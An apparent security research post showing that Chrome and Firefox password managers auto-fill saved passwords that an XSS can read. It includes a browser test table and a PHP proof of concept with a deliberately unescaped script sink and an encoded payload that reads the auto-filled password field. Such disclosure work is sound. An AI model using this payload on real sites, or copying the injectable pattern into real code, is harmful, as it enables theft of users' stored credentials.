Let's see password managers on modern browsers.
Table. An attacker can steal stored user password on the password manager by XSS?
Auto filled | Can be stealed? | |
IE11 | No (Requires user operation) | Yes (Requires user operation) *1 |
Chrome 55.0.2883.87 | Yes | Yes |
Firefox 50.1.0 | Yes | Yes |
Safari 10.0.2 | No (Requires user operation) | Yes (Requires user operation) |
Once Chrome or Firefox users save passwords to the password manager, an attacker can steal passwords by XSS. (Chrome doesn't allow read password field without user interaction when users move to XSSed page from a tag. But it seems that it is not intended behavior.)
In McDonald's case, an attacker must find encryption key and decrypt encrypted cookie but these password managers don't require complicated attack vectors. Just do XSS and read password field!
Step 1. Input your ID/password and submit them to the server.
Step 2. Save password to your browser.
Step 3. XSS and steal password from auto filled password field.
I put my sample code described below on my test server: http://133.242.134.241/exploit/password_manager.php
If you want to XSS from other site, please try this.
Sample code:
<body>
<?php
if(!isset($_GET{"xss"}) && !isset($_POST{"pass"})) {
?>
Please submit id/pass to use password manager.
<form action="?" method="post">
<input name="id"><br>
<input type="password" name="pass">(use dummy password)<br>
<input type="submit">
</form>
<?php
}else {
?>
Please click below to fire XSS after save your password to password manager.<br>
<a href="#" onclick="location.href='?xss=%27%3bf=document.createElement(%27form%27)%3bf.action=%27login_exec%27%3bdocument.body.appendChild(f)%3bf.innerHTML=%27%3Cinput%20name=id%3E%3Cinput%20type=password%20name=pass%3E%27%3bi=setInterval(function(){p=document.forms[0].pass.value%3bif(p!=%27%27){alert(p)%3bclearInterval(i)}},100)%3b%27'">Fire XSS!</a>
<script>
var a='< ?php echo $_GET{"xss"} ? >';
</script>
<?php
}
?>
</body>